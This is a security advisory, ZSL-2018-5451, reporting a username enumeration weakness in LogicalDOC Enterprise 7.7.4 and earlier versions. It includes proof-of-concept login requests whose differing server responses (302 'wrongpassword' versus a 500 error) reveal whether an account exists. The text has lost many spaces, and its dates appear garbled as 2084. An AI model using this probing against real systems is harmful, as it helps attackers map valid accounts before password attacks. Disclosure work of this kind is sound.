LogicalDOCEnterprise7.7.4UsernameEnumerationWeaknessVendor:LogicalDOCSrlProduct web page: https://www.logicaldoc.com
Affected version:7.7.47.7.37.7.27.7.17.6.47.6.27.5.17.4.27.1.1Summary:LogicalDOC is a free document management system that is designed
tohandle and share documents within an organization. LogicalDOC is a content
repository,withLucene indexing,Activiti workflow, and a set of automatic
importprocedures.Desc:The weakness is caused due tothe 'j_spring_security_check' script
and how it verifies provided credentials. Attacker can use this weakness
toenumerate valid users on the affected node.
Tested on:MicrosoftWindows10LinuxUbuntu16.04Java1.8.0_161Apache-Coyote/1.1ApacheTomcat/8.5.24ApacheTomcat/8.5.13Undisclosed8.41Vulnerability discovered by Gjoko 'LiquidWorm' Krstic@zeroscienceAdvisoryID:ZSL-2018-5451AdvisoryURL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php
26.01.2018--Request/response for existent username:---------------------------------------POST/j_spring_security_check HTTP/1.1Host:192.168.1.74:8080
j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
--HTTP/1.1302Set-Cookie: ldoc-failure=wrongpassword
Location://login.jsp?failure=wrongpasswordContent-Length:0Date:Tue,06Feb208419:42:15GMTConnection: close
Request/response for non-existent username:-------------------------------------------POST/j_spring_security_check HTTP/1.1Host:192.168.1.74:8080
j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp
--HTTP/1.1500Set-Cookie:JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD;Path=/;Secure;HttpOnlyContent-Type: text/html;charset=UTF-8Content-Length:78Date:Tue,06Feb208419:57:14GMTConnection: close
<html><body><div><br/><br/><strong>ERROR</strong></div></body><html>
